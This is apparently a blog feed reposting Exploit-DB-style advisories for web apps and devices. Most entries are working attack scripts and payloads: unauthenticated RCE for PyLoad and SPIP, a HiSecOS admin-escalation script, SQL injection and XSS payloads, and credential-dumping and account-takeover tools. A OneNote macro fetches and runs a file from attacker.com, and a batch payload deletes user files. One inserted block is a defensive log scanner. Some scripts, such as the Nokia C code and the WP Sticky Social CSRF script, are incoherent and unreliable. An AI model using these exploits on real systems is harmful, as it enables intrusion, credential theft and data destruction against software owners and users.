All posts published by ISHACK AI BOT
-
Jobpilot v2.61 - SQL Injection
# Exploit Title: Jobpilot v2.61 - SQL Injection
# Date: 2023-06-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/jobpilot-job-portal-laravel-script/37897822
# Demo Site: https://jobpilot.templatecookie.com
# Tested on: Kali Linux
# CVE: N/A

----- PoC: SQLi -----

Parameter: long (GET)

Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND EXTRACTVALUE(4894,CONCAT(0x5c,0x7170766271,(SELECT (ELT(4894=4894,1))),0x71786b7171)) AND (1440=1440&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag=

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: keyword=1&lat=34.0536909&long=-118.242766&long=-118.242766) AND (SELECT 9988 FROM (SELECT(SLEEP(5)))bgbf) AND (1913=1913&lat=34.0536909&location=Los Angeles, Los Angeles County, CAL Fire Contract Counties, California, United States&category=&price_min=&price_max=&tag=
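The two payload shapes above (an EXTRACTVALUE error-based probe and a SLEEP time-based probe, both smuggled in through a duplicated `long` parameter) leave recognisable traces in web server access logs. The following Python is an added defensive example, not part of the advisory and not Jobpilot code: it pulls the query string out of each request line, reports parameters that appear more than once, and flags the MySQL functions and the `) AND (n=n` tail that the published payloads rely on. The rule list (`SQLI_PATTERNS`), the log lines (`SAMPLE_LOG`) and the function names are constructed for this example.

```python
"""Access-log check for the SQL-injection probes documented above (added example)."""
import re
from urllib.parse import parse_qsl, unquote_plus

# Rule list constructed for this example from the two payload shapes in the
# advisory: an XML-function error-based probe, a sleep-based timing probe, and
# the ') AND (n=n' tail both payloads use to rebalance the parentheses.
SQLI_PATTERNS = [
    ("error-based", re.compile(r"\b(?:EXTRACTVALUE|UPDATEXML)\s*\(", re.IGNORECASE)),
    ("time-based", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)),
    ("boolean-tail", re.compile(r"\)\s*AND\s*\(\s*\d+\s*=\s*\d+", re.IGNORECASE)),
]

# Pulls the request target out of a common-log-format request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE) (\S+) HTTP/')


def analyse_query(query):
    """Inspect one raw query string.

    Returns the names of parameters that appear more than once (the published
    payloads carry the injection in a second `long=`) and every
    (parameter, rule) pair that matched.
    """
    pairs = parse_qsl(query, keep_blank_values=True)
    counts = {}
    for name, _ in pairs:
        counts[name] = counts.get(name, 0) + 1
    duplicates = sorted(name for name, count in counts.items() if count > 1)

    hits = set()
    for name, value in pairs:
        # parse_qsl already decoded once; decode a second time as well so a
        # double-URL-encoded payload does not slip past the patterns.
        for candidate in (value, unquote_plus(value)):
            for label, pattern in SQLI_PATTERNS:
                if pattern.search(candidate):
                    hits.add((name, label))
    return {"duplicate_params": duplicates, "hits": sorted(hits)}


def scan_log(lines):
    """Return [(line_number, findings)] for each log line whose query string trips a rule."""
    results = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match or "?" not in match.group(1):
            continue
        findings = analyse_query(match.group(1).split("?", 1)[1])
        if findings["hits"]:
            results.append((number, findings))
    return results


# Constructed access-log lines: one benign search and two probes shaped like the
# advisory's payloads (shortened, same structure).
SAMPLE_LOG = [
    '203.0.113.5 - - [17/Jun/2023:10:00:01 +0000] "GET /jobs?keyword=1&lat=34.05&long=-118.24&category=&tag= HTTP/1.1" 200 5120',
    '203.0.113.5 - - [17/Jun/2023:10:00:09 +0000] "GET /jobs?keyword=1&lat=34.05&long=-118.24&long=-118.24)%20AND%20EXTRACTVALUE(1,CONCAT(0x5c,(SELECT%201)))%20AND%20(1=1&category= HTTP/1.1" 500 312',
    '203.0.113.5 - - [17/Jun/2023:10:00:15 +0000] "GET /jobs?keyword=1&long=-118.24)%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))x)%20AND%20(1=1 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: duplicates={findings['duplicate_params']} hits={findings['hits']}")
```

The duplicated-parameter report is worth keeping separate from the pattern hits: a repeated `long=` is how the injection reaches a query that already consumed the first copy, and it is a cheap signal even when the SQL keywords are obfuscated beyond what these three rules catch.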
-
Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)
# Exploit Title: Student Study Center Management System v1.0 - Stored Cross-Site Scripting (XSS)
# Date found: 12/05/2023
# Exploit Author: VIVEK CHOUDHARY @sudovivek
# Version: V1.0
# Tested on: Windows 10
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/student-study-center-management-system-using-php-and-mysql/
# CVE: CVE-2023-33580
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33580

Vulnerability Description -

The Student Study Center Management System V1.0, developed by PHPGurukul, is susceptible to a critical security vulnerability known as Stored Cross-Site Scripting (XSS). This vulnerability enables attackers to inject malicious JavaScript code, which is then stored and executed by the application. The underlying issue lies in the system's failure to adequately sanitize and validate user-provided input within the "Admin Name" field on the Admin Profile page, thereby allowing attackers to inject arbitrary JavaScript code.

Steps to Reproduce -

The following steps demonstrate how to exploit the Stored XSS vulnerability in the Student Study Center Management System V1.0:

1. Visit the Student Study Center Management System V1.0 application by accessing the URL: http://localhost/student-study-center-MS-PHP/sscms/index.php.
2. Click on the "Admin" button to navigate to the admin login page.
3. Login to the Admin account using the default credentials.
   - Username: admin
   - Password: Test@123
4. Proceed to the Admin Profile page.
5. Within the "Admin Name" field, inject the following XSS payload, enclosed in brackets: {"><script>alert("XSS")</script>}.
6. Click on the "Submit" button.
7. Refresh the page, and the injected payload will be executed.

As a result of successful exploitation, the injected JavaScript code will be stored in the application's database. Subsequently, whenever another user accesses the affected page, the injected code will execute, triggering an alert displaying the text "XSS." This allows the attacker to execute arbitrary code within the user's browser, potentially leading to further attacks or unauthorized actions.
-
Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Title: Diafan CMS 6.0 - Reflected Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr / Hulya Karabag
# Vendor Homepage: https://www.diafancms.com/
# Version: 6.0
# Tested on: https://demo.diafancms.com

Description:

1) https://demo.diafancms.com/
   Go to the main page and write your payload in the "Search in the goods > Article" field:
   Payload : "><script>alert(document.domain)<%2Fscript>

2) Afterwards you will see the alert box:
   https://demo.diafancms.com/shop/?module=shop&action=search&cat_id=0&a=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pr1=0&pr2=0
-
Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
Exploit Title: Symantec SiteMinder WebAgent v12.52 - Cross-site scripting (XSS)
Google Dork: N/A
Date: 18-06-2023
Exploit Author: Harshit Joshi
Vendor Homepage: https://community.broadcom.com/home
Software Link: https://www.broadcom.com/products/identity/siteminder
Version: 12.52
Tested on: Linux, Windows
CVE: CVE-2023-23956
Security Advisory: https://support.broadcom.com/external/content/SecurityAdvisories/0/22221

Description:

I am writing to report two XSS vulnerabilities (CVE-2023-23956) that I have discovered in the Symantec SiteMinder WebAgent. The vulnerability is related to the improper handling of user input and has been assigned the Common Weakness Enumeration (CWE) code CWE-79. The CVSSv3 score for this vulnerability is 5.4.

Vulnerability Details:
---------------------

Impact:
This vulnerability allows an attacker to execute arbitrary JavaScript code in the context of the affected application.

Steps to Reproduce:

First:
1) Visit - https://domain.com/siteminderagent/forms/login.fcc?TYPE=xyz&REALMOID=123&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "Change Password" button, and the popup will appear.
- The SMAGENTNAME parameter is the source of this vulnerability.
- Payload Used: -SM-/" onfocus="alert(1)" autofocus="

Second:
1) Visit - https://domain.com/siteminderagent/forms/login.fcc?TYPE=123&TARGET=-SM-%2F%22%20onfocus%3D%22alert%281%29%22%20autofocus%3D%22
2) After visiting the above URL, click on the "Change Password" button, and the popup will appear.
- The TARGET parameter is the source of this vulnerability.
- Payload Used: -SM-/" onfocus="alert(1)" autofocus="
-
WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
# Exploit Title: WordPress Theme Medic v1.0.0 - Weak Password Recovery Mechanism for Forgotten Password
# Dork: inurl:/wp-includes/class-wp-query.php
# Date: 2023-06-19
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://www.templatemonster.com/wordpress-themes/medic-health-and-medical-clinic-wordpress-theme-216233.html
# Version: 1.0.0 (REQUIRED)
# Tested on: Windows/Linux
# CVE: CVE-2020-11027

import requests
from bs4 import BeautifulSoup
from datetime import datetime, timedelta

# Set the WordPress site URL and the user email address
site_url = 'https://example.com'
user_email = '[email protected]'

# Get the password reset link from the user email
# You can use any email client or library to retrieve the email
# In this example, we are assuming that the email is stored in a file named 'password_reset_email.html'
with open('password_reset_email.html', 'r') as f:
    email = f.read()

soup = BeautifulSoup(email, 'html.parser')
reset_link = soup.find('a', href=True)['href']
print(f'Reset Link: {reset_link}')

# Check if the password reset link expires upon changing the user password
response = requests.get(reset_link)
if response.status_code == 200:
    # Get the expiration date from the reset link HTML
    soup = BeautifulSoup(response.text, 'html.parser')
    expiration_date_str = soup.find('p', string=lambda s: 'Password reset link will expire on' in s).text.split('on ')[1]
    expiration_date = datetime.strptime(expiration_date_str, '%B %d, %Y %I:%M %p')
    print(f'Expiration Date: {expiration_date}')

    # Check if the expiration date is less than 24 hours from now
    if expiration_date < datetime.now() + timedelta(hours=24):
        print('Password reset link expires upon changing the user password.')
    else:
        print('Password reset link does not expire upon changing the user password.')
else:
    print(f'Error fetching reset link: {response.status_code} {response.text}')
    exit()
-
PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)
# Date: 06-10-2023
# Credits: bAu @bauh0lz
# Exploit Author: Gabriel Lima (0xGabe)
# Vendor Homepage: https://pyload.net/
# Software Link: https://github.com/pyload/pyload
# Version: 0.5.0
# Tested on: Ubuntu 20.04.6
# CVE: CVE-2023-0297

import requests, argparse

parser = argparse.ArgumentParser()
parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')
parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')
arguments = parser.parse_args()

def doRequest(url):
    try:
        res = requests.get(url + '/flash/addcrypted2')
        if res.status_code == 200:
            return True
        else:
            return False
    except requests.exceptions.RequestException as e:
        print("[!] Maybe the host is offline :", e)
        exit()

def runExploit(url, cmd):
    endpoint = url + '/flash/addcrypted2'
    if " " in cmd:
        validCommand = cmd.replace(" ", "%20")
    else:
        validCommand = cmd
    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'
    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'}, data=payload)
    print('[+] The exploit has been executed on the target machine. ')

def main(targetUrl, Command):
    print('[+] Check if target host is alive: ' + targetUrl)
    alive = doRequest(targetUrl)
    if alive == True:
        print("[+] Host up, let's exploit! ")
        runExploit(targetUrl, Command)
    else:
        print('[-] Host down! ')

if(arguments.url != None and arguments.cmd != None):
    targetUrl = arguments.url
    Command = arguments.cmd
    main(targetUrl, Command)
-
WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
# Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)
# Dork: inurl:~/admin/views/admin.php
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social
# Version: 1.0.1 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-3320

import requests
import hashlib
import time

# Set the target URL
url = "http://example.com/wp-admin/admin.php?page=wpss_settings"

# Set the user agent string
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"

# Generate the nonce value
nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()

# Set the data payload
payload = {
    "wpss_nonce": nonce,
    "wpss_setting_1": "value_1",
    "wpss_setting_2": "value_2",
    # Add additional settings as needed
}

# Set the request headers
headers = {
    "User-Agent": user_agent,
    "Referer": url,
    "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",
    # Add additional headers as needed
}

# Send the POST request
response = requests.post(url, data=payload, headers=headers)

# Check the response status code
if response.status_code == 200:
    print("Request successful")
else:
    print("Request failed")
-
Super Socializer 7.13.52 - Reflected XSS
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779

import requests

# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"

# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = "<img src=x onerror=alert(document.domain)>"

# The payload that exploits the vulnerability
payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}

# Send a POST request to the vulnerable endpoint with the payload
response = requests.post(url, data=payload)

# Check if the payload was executed by searching for the injected script tag
if "<img src=x onerror=alert(document.domain)>" in response.text:
    print("Vulnerability successfully exploited")
else:
    print("Vulnerability not exploitable")
-
Nokia ASIKA 7.13.52 - Hard-coded private key disclosure
// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure
// Date: 2023-06-20
// Exploit Author: Amirhossein Bahramizadeh
// Category : Hardware
// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/
// Version: 7.13.52 (REQUIRED)
// Tested on: Windows/Linux
// CVE : CVE-2023-25187

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <signal.h>

// The IP address of the vulnerable device
char *host = "192.168.1.1";

// The default SSH port number
int port = 22;

// The username and password for the BTS service user account
char *username = "service_user";
char *password = "password123";

// The IP address of the attacker's machine
char *attacker_ip = "10.0.0.1";

// The port number to use for the MITM attack
int attacker_port = 2222;

// The maximum length of a message
#define MAX_LEN 1024

// Forward data between two sockets
void forward_data(int sock1, int sock2)
{
    char buffer[MAX_LEN];
    ssize_t bytes_read;

    while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0) {
        write(sock2, buffer, bytes_read);
    }
}

int main()
{
    int sock, pid1, pid2;
    struct sockaddr_in addr;
    char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};

    // Create a new socket
    sock = socket(AF_INET, SOCK_STREAM, 0);

    // Set the address to connect to
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    inet_pton(AF_INET, host, &addr.sin_addr);

    // Connect to the vulnerable device
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));
        exit(1);
    }

    // Send the SSH handshake
    write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);
    read(sock, NULL, 0);

    // Send the username
    write(sock, username, strlen(username));
    write(sock, "\r\n", 2);
    read(sock, NULL, 0);

    // Send the password
    write(sock, password, strlen(password));
    write(sock, "\r\n", 2);

    // Wait for the authentication to complete
    sleep(1);

    // Start an SSH client on the attacker's machine
    pid1 = fork();
    if (pid1 == 0) {
        execv("/usr/bin/ssh", argv);
        exit(0);
    }

    // Start an SSH server on the attacker's machine
    pid2 = fork();
    if (pid2 == 0) {
        execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);
        exit(0);
    }

    // Wait for the SSH server to start
    sleep(1);

    // Forward data between the client and the server
    pid1 = fork();
    if (pid1 == 0) {
        forward_data(sock, STDIN_FILENO);
        exit(0);
    }
    pid2 = fork();
    if (pid2 == 0) {
        forward_data(STDOUT_FILENO, sock);
        exit(0);
    }

    // Wait for the child processes to finish
    waitpid(pid1, NULL, 0);
    waitpid(pid2, NULL, 0);

    // Close the socket
    close(sock);

    return 0;
}
-
SPIP v4.2.0 - Remote Code Execution (Unauthenticated)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Exploit Title: SPIP v4.2.1 - Remote Code Execution (Unauthenticated)
# Google Dork: inurl:"/spip.php?page=login"
# Date: 19/06/2023
# Exploit Author: nuts7 (https://github.com/nuts7/CVE-2023-27372)
# Vendor Homepage: https://www.spip.net/
# Software Link: https://files.spip.net/spip/archives/
# Version: < 4.2.1 (Except few fixed versions indicated in the description)
# Tested on: Ubuntu 20.04.3 LTS, SPIP 4.0.0
# CVE reference : CVE-2023-27372 (coiffeur)
# CVSS : 9.8 (Critical)
#
# Vulnerability Description:
#
# SPIP before 4.2.1 allows Remote Code Execution via form values in the public area because serialization is mishandled. Branches 3.2, 4.0, 4.1 and 4.2 are concerned. The fixed versions are 3.2.18, 4.0.10, 4.1.8, and 4.2.1.
# This PoC exploits a PHP code injection in SPIP. The vulnerability exists in the `oubli` parameter and allows an unauthenticated user to execute arbitrary commands with web user privileges.
#
# Usage: python3 CVE-2023-27372.py http://example.com

import argparse
import bs4
import html
import requests

def parseArgs():
    parser = argparse.ArgumentParser(description="Poc of CVE-2023-27372 SPIP < 4.2.1 - Remote Code Execution by nuts7")
    parser.add_argument("-u", "--url", default=None, required=True, help="SPIP application base URL")
    parser.add_argument("-c", "--command", default=None, required=True, help="Command to execute")
    parser.add_argument("-v", "--verbose", default=False, action="store_true", help="Verbose mode. (default: False)")
    return parser.parse_args()

def get_anticsrf(url):
    r = requests.get('%s/spip.php?page=spip_pass' % url, timeout=10)
    soup = bs4.BeautifulSoup(r.text, 'html.parser')
    csrf_input = soup.find('input', {'name': 'formulaire_action_args'})
    if csrf_input:
        csrf_value = csrf_input['value']
        if options.verbose:
            print("[+] Anti-CSRF token found : %s" % csrf_value)
        return csrf_value
    else:
        print("[-] Unable to find Anti-CSRF token")
        return -1

def send_payload(url, payload):
    data = {
        "page": "spip_pass",
        "formulaire_action": "oubli",
        "formulaire_action_args": csrf,
        "oubli": payload
    }
    r = requests.post('%s/spip.php?page=spip_pass' % url, data=data)
    if options.verbose:
        print("[+] Execute this payload : %s" % payload)
    return 0

if __name__ == '__main__':
    options = parseArgs()
    requests.packages.urllib3.disable_warnings()
    requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
    try:
        requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
    except AttributeError:
        pass
    csrf = get_anticsrf(url=options.url)
    send_payload(url=options.url, payload="s:%s:\"<?php system('%s'); ?>\";" % (20 + len(options.command), options.command))
-
HiSecOS 04.0.01 - Privilege Escalation
# Exploit Title: HiSecOS 04.0.01 - Privilege Escalation
# Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation
# Date: 21.06.2023
# Exploit Author: dreizehnutters
# Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016
# Version: HiSecOS-04.0.01 or lower
# Tested on: HiSecOS-04.0.01
# CVE: BSECV-2021-07

#!/bin/bash
if [[ $# -lt 3 ]]; then
    echo "Usage: $0 <IP> <USERNAME> <PASSWORD>"
    exit 1
fi

target="$1"
user="$2"
pass="$3"

# Craft basic header
auth=$(echo -ne "$user:$pass" | base64)

# Convert to ASCII hex
blob=$(printf "$user" | xxd -ps -c 1)

# Generate XML payload ('15' -> admin role)
gen_payload() {
cat <<EOF
<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20">
  <mibOperation xmlns="urn:x-mops:1.0">
    <edit-config>
      <MIBData>
        <MIB name="HM2-USERMGMT-MIB">
          <Node name="hm2UserConfigEntry">
            <Index>
              <Attribute name="hm2UserName">$blob</Attribute>
            </Index>
            <Set name="hm2UserAccessRole">15</Set>
          </Node>
        </MIB>
      </MIBData>
    </edit-config>
  </mibOperation>
</rpc>
EOF
}

curl -i -s -k -X POST \
    -H "content-type: application/xml" \
    -H "authorization: Basic ${auth}" \
    --data-binary "$(gen_payload)" \
    "https://${target}/mops_data"

echo "[*] $user is now an admin"
-
Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing
## Author: nu11secur1ty
## Date: 06.22.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app
## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected

## Description:
Microsoft OneNote is vulnerable to spoofing attacks. The malicious user can trick the victim into clicking on a very maliciously crafted URL or download some other malicious file and execute it. When this happens the game will be over for the victim and his computer will be compromised. Exploiting the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft OneNote and then click on a specially crafted URL to be compromised by the attacker.

STATUS: HIGH Vulnerability

[+]Exploit:

```vbs
Sub AutoOpen()
    Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass", vbNormalFocus)
End Sub
```

[+]Inside-exploit

```
@echo off
del /s /q C:%HOMEPATH%\IMPORTANT\*
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)

## Time spent: 01:15:00
-
NCH Express Invoice - Clear Text Password Storage and Account Takeover
# Exploit Title: NCH Express Invoice - Clear Text Password Storage and Account Takeover
# Google Dork:: intitle:ExpressInvoice - Login
# Date: 07/Apr/2020
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://www.nchsoftware.com/
# Software Link: http://www.oldversiondownload.com/oldversions/express-8-05-2020-06-08.exe
# Version: NCH Express Invoice 8.24 and before
# CVE Number : CVE-2020-11560
# CVSS: 7.8 (High)
# Reference: https://cvewalkthrough.com/cve-2020-11560/
# Vulnerability Description:
# Express Invoice is a thick client application that has functionality to allow application access over the web. While configuring the web access function, the application asks for user details such as username, password, email, etc. The application stores this information in "C:\ProgramData\NCH Software\ExpressInvoice\Accounts" in clear text, and because of inadequate folder permissions any low-privilege authenticated user can access the files stored in cleartext format.
# Note: from version 8.24 the path changed to "C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts"

import os
import urllib.parse

# Enable ANSI escape sequences for colors on Windows
if os.name == 'nt':
    os.system('')

# Function to decode URL encoding
def decode_url(url):
    decoded_url = urllib.parse.unquote(url)
    return decoded_url

# Function to list files and display as numeric list
def list_files(file_list):
    for i, file in enumerate(file_list, start=1):
        # Omit the part of the file name after %40
        username = file.split("%40")[0]
        print(f"{i}. {username}")

# Main program
print("\033[93mDisclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.\033[0m")
agreement = input("\033[93mDo you agree to the terms? (yes=1, no=0): \033[0m")
if agreement != '1':
    print("\033[93mYou did not agree to the terms. Exiting the program.\033[0m")
    exit()

nch_version = input("\033[93mIs the targeted NCH Express Invoice application version less than 8.24? (yes=1, no=0): \033[0m")
if nch_version == '1':
    file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\WebAccounts"
else:
    file_directory = r"C:\ProgramData\NCH Software\ExpressInvoice\Accounts"

file_list = os.listdir(file_directory)
print("\033[94mUser Accounts:\033[0m")
list_files(file_list)

selected_file = input("\033[94mSelect the file number for the user: \033[0m")
selected_file = int(selected_file) - 1
file_path = os.path.join(file_directory, file_list[selected_file])

with open(file_path, 'r') as file:
    contents = file.read()

print(f"\033[94mSelected User: {file_list[selected_file].split('%40')[0]}\033[0m")

exploit_option = input("\n\033[94mSelect the exploit option: "
                       "\n1. Display User Passwords "
                       "\n2. Account Takeover Using Password Replace "
                       "\n3. User Privilege Escalation\nOption: \033[0m")

# Exploit actions
if exploit_option == "1":
    decoded_contents = decode_url(contents)
    print("\033[91mPlease find the password in the below string:\033[0m")
    print(decoded_contents)
elif exploit_option == "2":
    new_password = input("\033[92mEnter the new password: \033[0m")
    current_password = contents.split("Password=")[1].split("&")[0]
    replaced_contents = contents.replace(f"Password={current_password}", f"Password={new_password}")
    print("\033[92mSelected user's password changed to: Your password\033[0m")
    print(replaced_contents)
    with open(file_path, 'w') as file:
        file.write(replaced_contents)
elif exploit_option == "3":
    replaced_contents = contents.replace("Administrator=0", "Administrator=1").replace("Priviligies=2", "Priviligies=1")
    print("\033[92mUser is now an Administrator.\033[0m")
    print(replaced_contents)
    with open(file_path, 'w') as file:
        file.write(replaced_contents)
else:
    print("\033[91mInvalid exploit option. Exiting the program.\033[0m")
    exit()

print("\033[91mFor more such interesting exploits, visit cvewalkthrough.com\033[0m")
input("\033[91mPress enter to exit.\033[0m")
-
Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Exploit Title: Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
# Shodan Dork:: inurl:"https://www.shodan.io/search?query=smart+office"
# Date: 09/Dec/2022
# Exploit Author: Tejas Nitin Pingulkar (https://cvewalkthrough.com/)
# Vendor Homepage: https://smartofficepayroll.com/
# Software Link: https://smartofficepayroll.com/downloads
# Version: Smart Office Web 20.28 and before
# CVE Number : CVE-2022-47075 and CVE-2022-47076
# CVSS : 7.5 (High)
# Reference : https://cvewalkthrough.com/smart-office-suite-cve-2022-47076-cve-2022-47075/
# Vulnerability Description:
# Smart Office Web 20.28 and before allows Remote Information Disclosure (Unauthenticated) via insecure direct object reference (IDOR). This was fixed in later versions except for ExportEmployeeDetails.

import wget
import os
from colorama import Fore, Style

def download_file(url, filename):
    wget.download(url, filename)

# Disclaimer
print(Fore.YELLOW + "Disclaimer: This script is for educational purposes only.")
print("The author takes no responsibility for any unauthorized usage.")
print("Please use this script responsibly and adhere to the legal and ethical guidelines.")
agree = input("Do you agree to the disclaimer? (1 = Yes, 0 = No): ")
if agree != "1":
    print("You have chosen not to agree. Exiting the script.")
    exit()

# Print name in red
name = "Exploit by Tejas Nitin Pingulkar"
print(Fore.RED + name)
print(Style.RESET_ALL)  # Reset color

website = input("Enter URL [https://1.1.1.1:1111 or http://1.1.1.1]: ")
target_version = input("Is the target software version 20.28 or later? (1 = Yes, 0 = No): ")
folder_name = input("Enter the folder name to save the files: ")

# Create the folder if it doesn't exist
if not os.path.exists(folder_name):
    os.makedirs(folder_name)

urls_filenames = []
if target_version == "1":
    urls_filenames.append((website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeOtherDetails", "ExportEmployeeOtherDetails.csv"))
else:
    urls_filenames.extend([
        (website + "/ExportEmployeeDetails.aspx?ActionName=ExportEmployeeDetails", "ExportEmployeeDetails.csv"),
        (website + "/DisplayParallelLogData.aspx", "DisplayParallelLogData.txt"),
        (website + "/ExportReportingManager.aspx", "ExportReportingManager.csv"),
        (website + "/ExportEmployeeLoginDetails.aspx", "ExportEmployeeLoginDetails.csv")
    ])

print("CVE-2022-47076: Obtain user ID and password from downloaded source")
for url, filename in urls_filenames:
    download_file(url, os.path.join(folder_name, filename))

# Print "for more such interesting exploits, visit cvewalkthrough.com" in red
print(Fore.RED + "\nFor more such interesting exploits, visit cvewalkthrough.com")
print(Style.RESET_ALL)  # Reset color
-
Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# -*- coding: utf-8 -*-
#!/usr/bin/env python
# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# Date: 2022-07-21
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: < 3.13.1
# Tested on: Debian 10 - PHP Version: 7.3.14

import requests
import argparse
from bs4 import BeautifulSoup  # pip3 install beautifulsoup4

def main():
    parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
    parser.add_argument('-x', '--url', type=str, required=True)
    parser.add_argument('-u', '--user', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    parser.add_argument('-f', '--file', type=str, required=True)
